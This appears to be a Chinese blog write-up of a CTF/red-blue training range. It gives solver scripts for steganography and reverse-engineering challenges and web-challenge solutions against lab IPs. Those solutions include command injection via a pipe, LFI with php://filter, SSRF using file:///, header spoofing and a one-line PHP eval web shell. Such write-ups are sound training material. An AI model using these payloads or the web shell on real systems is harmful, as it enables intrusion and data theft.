    file = open("处理过的文本.txt","rb")
    x = ''                                      # x即bin_str
    lines =  file.readlines()
    print(len(lines))
    count=0
    for line in lines:
        l = str(line, encoding = "utf-8")
        stego = l.replace('\n','')
        #print(stego)
        count=count+1
        #用下面这条语句判定出,哪行有问题,然后眼睛找,手动改即可
        print(count)
        realtext = base64.b64decode(l)
        #print(realtext)
        realtext = str(base64.b64encode(realtext),encoding = "utf-8")
        #print(realtext)
        diff = get_diff(stego, realtext)        # diff为隐写字串与实际字串的二进制差值
        n = stego.count('=')
        if diff:
            x += bin(diff)[2:].zfill(n*2)
        else:
            x += '0' * n*2   
    i = 0
    flag = ''
    while i < len(x):
        if int(x[i:i+8],2):
            flag += chr(int(x[i:i+8],2))
        i += 8
    print(len(flag))
    print(flag)

if __name__ == '__main__':
    b64_stego_decode()
	

    flag{guowangjishuxueyuan}
    • 解题思路
      在这里插入图片描述
      在这里插入图片描述
      在这里插入图片描述

三、反编译可执行软件和解密

1. 反编译靶场解题

* 题目整体一览

在这里插入图片描述

* re1

a=[   0xC6, 0x44, 0x24, 0x2F, 0x66, 0xC6, 0x44, 0x24, 0x2E, 0x6C, 
  0xC6, 0x44, 0x24, 0x2D, 0x61, 0xC6, 0x44, 0x24, 0x2C, 0x67, 
  0xC6, 0x44, 0x24, 0x2B, 0x7B, 0xC6, 0x44, 0x24, 0x2A, 0x52, 
  0xC6, 0x44, 0x24, 0x29, 0x65, 0xC6, 0x44, 0x24, 0x28, 0x5F, 
  0xC6, 0x44, 0x24, 0x27, 0x31, 0xC6, 0x44, 0x24, 0x26, 0x73, 
  0xC6, 0x44, 0x24, 0x25, 0x5F, 0xC6, 0x44, 0x24, 0x24, 0x53, 
  0xC6, 0x44, 0x24, 0x23, 0x30, 0xC6, 0x44, 0x24, 0x22, 0x5F, 
  0xC6, 0x44, 0x24, 0x21, 0x43, 0xC6, 0x44, 0x24, 0x20, 0x30, 
  0xC6, 0x44, 0x24, 0x1F, 0x4F, 0xC6, 0x44, 0x24, 0x1E, 0x4C, 
  0xC6, 0x44, 0x24, 0x1D, 0x7D ]
flag = ''
for i in range(4,len(a),5):
	flag+=chr(a[i])
	# pass
print(flag)

flag{Re_1s_S0_C0OL}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

* re2

import base64
DICT='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
DICT1='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/='
a='pCNxpTJ2d3d5nPoQnSAAnQBel4lihldkikV78nQ='
b=''
for i in range(len(a)):
	b+=DICT[DICT1.index(a[i])]
print(b)
print(base64.b64decode(b))

flag{B43E_64_i$_INTERESTING!}

在这里插入图片描述
在这里插入图片描述

* re3

import base64
a='e3nifIH9b_C@n@dH'
flag=''
for i in range(len(a)):
	flag+=chr(ord(a[i])-i)
print(flag)

flag{i_l0ve_you}

在这里插入图片描述

* re4

a=[0xC6, 0x45, 0xD0, 0x66, 0xC6, 0x45, 0xD1, 0xA0, 0xC6, 0x45, 
  0xD2, 0xB6, 0xC6, 0x45, 0xD3, 0xC0, 0xC6, 0x45, 0xD4, 0x77, 
  0xC6, 0x45, 0xD5, 0xE0, 0xC6, 0x45, 0xD6, 0x16, 0xC6, 0x45, 
  0xD7, 0x41, 0xC6, 0x45, 0xD8, 0x97, 0xC6, 0x45, 0xD9, 0xC0, 
  0xC6, 0x45, 0xDA, 0xF7, 0xC6, 0x45, 0xDB, 0xB2, 0xC6, 0x45, 
  0xDC, 0x06, 0xC6, 0x45, 0xDD, 0x52, 0xC6, 0x45, 0xDE, 0x06, 
  0xC6, 0x45, 0xDF, 0x01, 0xC6, 0x45, 0xE0, 0xD7, 0xC6, 0x45, 
  0xE1, 0x21, 0xC6, 0x45, 0xE2, 0x46, 0xC6, 0x45, 0xE3, 0xD0, 
  0xC6, 0x45, 0xE4, 0x36, 0xC6, 0x45, 0xE5, 0x40, 0xC6, 0x45, 
  0xE6, 0x97]
flag = ''
b=[]
for i in range(3,len(a),4):
  #高低位互换
  b.append(a[i]*16&0xff|a[i]>>4)
  # b.append(a[i]*16|a[i]>>4)
pass
print(b) 
flag +=chr(b[0])
for i in range(1,len(b)):
  flag +=chr(b[i]^b[i-1])
print(flag)

flag{youmusTKEEpmoving}

在这里插入图片描述

* re5

a1=[]
a2=[
  0x7E, 0x74, 0x75, 0x7F, 0x67, 0x63, 0x24, 0x63, 0x60, 0x65, 
  0x74, 0x6D, 0x24, 0x7D, 0x43, 0x25, 0x7A, 0x69]
b=[]
v5=[]
v4=[]
v3=[]

v7=18
flag=''
for i in range(0,18,3):
	print(i)
	v5.append(a2[i])
	v5.append(a2[i+1])
	v5.append(a2[i+2])
	print(v5[i])
	flag+=(chr((v7^v5[i])-6))
	flag+=(chr((v5[i+1]^v7)+6))
	flag+=chr(v5[i+2]^6^v7)
print(flag)

flag{w0wtqly0uW1n}

四、红蓝安全攻防演练-WEB安全

1. 靶场Web题目讲解

* 题目整体一览

在这里插入图片描述
在这里插入图片描述

* 代理拦截讲解

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

* php的有趣的特性

  • 题目
    题目:  php弱类型语言
解题方式:
请求头加:?a=PJNPDWY&b=QNKCDZO&c=123&d=php://input 
请求体为: 123

    flag{ab4ea15bd59038a6c7b823ebeee4b8ba}
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

* phpBestLanguage

  • 题目
    题目:http://172.31.27.248:8109 php世界上最好的语言
解题:
请求头:?ac=123&fn=php://input
请求体:123

    flag{5592f1a9fa885a77ba55497e501a101a}
    在这里插入图片描述
    在这里插入图片描述

* 命令执行-ping ping ping

  • 题目
    解题:
127.0.0.1 | ls
127.0.0.1 | cat f14g_saikjmld98401294.php

    flag{random_php_flag_there}
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

* 文件包含2

  • 题目
    题目:http://172.31.27.248:8107 你能读到flag.php的内容吗
解题:http://172.31.27.248:8107/index.php?file=php://filter/read=convert.base64-encode/resource=flag.php   
使读到的文件内容为base64,然后解密

    flag{792b5e3054812cfe1f41ba3dda2a2948}
    在这里插入图片描述
    在这里插入图片描述
  • 文件包含
    题目:http://172.31.27.248:8106 flag在根目录!
解题:http://172.31.27.248:8106/index.php?file=/flag		

    flag{d41d8cd98f00b204e9800998ecf8427e}
    在这里插入图片描述

* 文件上传

  • 题目
    题目:http://172.31.27.248:8103 只能上传gif!!!
解题:
<?php
@eval($_POST[ljj]);
?>

    flag = "flag{ffffffffllllaaggg_!!!}
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

* ssrf

  • 题目
    题目:http://172.31.27.248:8102
解题:http://172.31.27.248:8102/?url=file:///flag.txt

    flag{4787370fb09bd230f863731d2ffbff6a}
    在这里插入图片描述

* xff

  • 题目
    题目:http://172.31.27.248:8101 请从本地访问服务
解题:
x-forwarded-for:127.0.0.1
referer:http://127.0.0.1 

    flag{15cc8eee88302965c61497c147e6ca4c}
    在这里插入图片描述

* WEB-GET

  • 题目
    题目:http://172.31.27.248:1024/
解题:http://172.31.27.248:1024/?what=flag

    flag{Bugku_get_su8kej2en}
    在这里插入图片描述
    在这里插入图片描述

参考文档

北风toto
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网络安全】黑客攻防与入侵检测(练习题)
计算机小白努力学习
09-16 1万+
1. 选择题 (1)在黑客攻击技术中,( )黑客发现获得主机信息的一种最佳途径。 A.网络监听 B.缓冲区溢出 C.端口扫描 D.口令破解 (2)一般情况下,大多数监听工具不能够分析的协议是( )。 A. 标准以太网 B. TCP/IP C. SNMP和CMIS D. IPX和DECNet (3)改变路由信息
攻防演练的梳理总结
weixin_68789096的博客
04-26 2791
国家级攻防演练从2016年开始,已经走过了6个年头,它是由公安部组织的,这个网络安全攻防演练集结了国家顶级的攻防力量,以不限制手段、路径,进行获取权限并攻陷指定靶机为目的实战攻防演练。通过真实网络中的攻防演练,可以全面评估目标所在网络的整体安全防护能力,检验防守方安全监测、防护和应急响应机制及措施的有效性,锻炼应急响应队伍提升安全事件处置的能力。攻防演练主要目标涵盖国家重要行业的关键信息基础设施、每年覆盖行业、单位、系统都在逐渐扩大。这个攻防演练时间一般持续2到3周。一般护网演练都是在白天工
【无标题】近几年攻防演练攻击队典型突破的例子
m0_73803866的博客
09-30 1390
实战攻防演练中红队网络的部署情况各有特点,蓝队也会根据攻 击目标的不同而采取不同的攻击策略和手段。下面几个案例展示的就 是针对红队网络的不同薄弱点采取的不同的典型攻击策略与方法手 段。正面突破:跨网段控制工控设备某企业为一家国内的大型制造业企业,其内部生产网大量使用双 网卡技术实现网络隔离。在本次实战攻防演练中,攻击队的目标是获 取该企业工控设备的控制权限。经过前期的情报搜集与分析,攻击队制定了首先突破办公内网, 再通过办公内网渗透进入工控网的战略部署。(1)突破办公内网攻击队首先选择将该企业的门户网站作为
20232803 2023-2024-2 《网络攻防实践》实践八报告
最新发布
weixin_46701653的博客
05-03 828
在分析网络数据源的过程中,面对大量的数据,我学会了如何筛选和识别关键信息,通过对数据包的深入分析,我能够理解攻击者的策略和行为模式。在筛选后的数据包中发现只有NBNS包,NBNS是网络基本输入/输出系统(NetBIOS)的一部分,主要负责在基于NetBIOS名称访问的网络上提供主机名和地址映射服务。如上图所示,前面的字符串都是一些乱码,而最后出现了两个dll文件和三个没有文件名后缀的文件,根据这三个文件的文件名,猜测是程序或函数。在筛选后的数据包中只有一些TCP三次握手过程的数据包,没有数据的交互。
企业如何开展安全测试攻防实战
测试开发技术
04-26 363
在今天的数字化时代,企业已经离不开了信息化、网络化,而信息化和网络化带来的威胁也是实实在在存在的。安全涵盖的范围很广,常见的比如网络安全、数据安全、应用安全、主机安全、内网安全等等。为了保障企业信息安全,开展安全测试攻防是必不可少的。本文就将指导企业如何开展安全测试攻防实战,并介绍安全测试方法、工具、案例等内容。1、安全测试方法有哪些?1.1 渗透测试渗透测试也叫漏洞评估,是指通过模拟黑客攻击企业...
网络安全实战攻防演练应急处置预案_网络安全技术攻防演练方案
yy1715713348的博客
02-16 1549
(1) 蜜罐系统,还用于将检测到的疑似社会工程学攻击事件发送给控制器;控制器,还用于将蜜罐系统发送的疑似社会工程学攻击事件存储至数据存储系统,并向事件分析系统下发与疑似社会工程学攻击事件对应的事件类型判断指令。(2) 收到钓鱼邮件。(3) 短网址替换真实网址,欺骗用户访问。(4) 防恶意软件,防火墙,入侵检测系统告警。
2023网络攻防演练网络安全意识培训
08-23
2023网络攻防演练网络安全意识培训
网络攻防实战演练专题培训课件.ppt
10-14
网络攻防实战演练专题培训课件 本课程主要讲解了网络攻防实战演练相关知识点,涵盖了网络侦查和审计技术、安全扫描技术、Traceroute 命令原理等方面的内容。 一、网络侦查和审计技术 网络侦查和审计技术是网络...
网络安全实战攻防演练部署研究.pdf
09-20
网络安全实战攻防演练部署研究.pdf
测试用例设计模板.xlsx
05-12
很多有大量数据处理的系统都有批量导入导出功能。导入导出的文件格式通常为Excel文件。对于导入导出功能也是个测试的难点和复杂点,总结主要测试点有以下内容:
密码 攻防实战大演习
10-21
密码攻防实战大演习 安全真是一个说不完的话题,就我们用户目前所遇到的安全防范措施主要是密码保护,所以今天我们将从攻和防两个方面讲讲密码保护问题。
中国首届医院网络安全攻防演练Web部分真题
07-13
中国首届医院网络安全攻防演练Web部分真题,厦门站。一个WEB站点 源码。
ctf网络安全攻防练习题
12-04
ctf网络安全攻防练习题 从N=NP能得到的结论当然是N=1或者P=0,然后结合图片内容,猜测此题跟二进制01有关,信息应该藏在像素中等等
网络安全攻防实战标准试题
06-28
网络安全攻防实战标准试题,每套题判断题30道,单选题60道,多选题30道,共两套题。
重庆网络广播电视台网络安全攻防实战演习总结.pdf
09-19
重庆网络广播电视台网络安全攻防实战演习总结.pdf
攻防比赛中蓝队常用的攻击方法
m0_73803866的博客
09-28 9032
实战过程中,蓝队专家根据实战攻防演练的任务特点逐渐总结 出一套成熟的做法:外网纵向突破重点寻找薄弱点,围绕薄弱点,利 用各种攻击手段实现突破;内网横向拓展以突破点为支点,利用各种 攻击手段在内网以点带面实现横向拓展,遍地开花。实战攻防演练 中,各种攻击手段的运用往往不是孤立的,而是相互交叉配合的,某 一渗透拓展步骤很难只通过一种手段实现,通常需要同时运用两种或 两种以上的手段才能成功。外网纵向突破和内网横向拓展使用的攻击 手段大多类似,区别只在于因为目标外网、内网安全防护特点不同而 侧重不同的攻击手段(见
攻防演练总结1
qq_40334963的博客
11-03 5062
攻防演练总结1 web渗透 弱口令 傻瓜版本弱口令:admin/123456 admin/admin@123 admin/abcd1234! sysadmin/123456(即使登录口有验证码和登录次数限制爆破,手工尝试也极容易命中 ) 稍微好一点的就是账号/密码使用身份证号,邮箱等个人信息组合,攻击者要想爆破此类密码就需要收集目标个人信息制作字典,加大了攻击难度。 Sql注入 利用方法:...
实战演练网络攻防综合技能提升
网络攻防综合训练》是一门结合理论学习和实践经验的课程,它通过实战操作,不仅传授了网络安全的硬技能,还培养了学生的信息安全防范意识和实际操作能力,为他们未来在网络安全领域的发展打下了坚实的基础。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值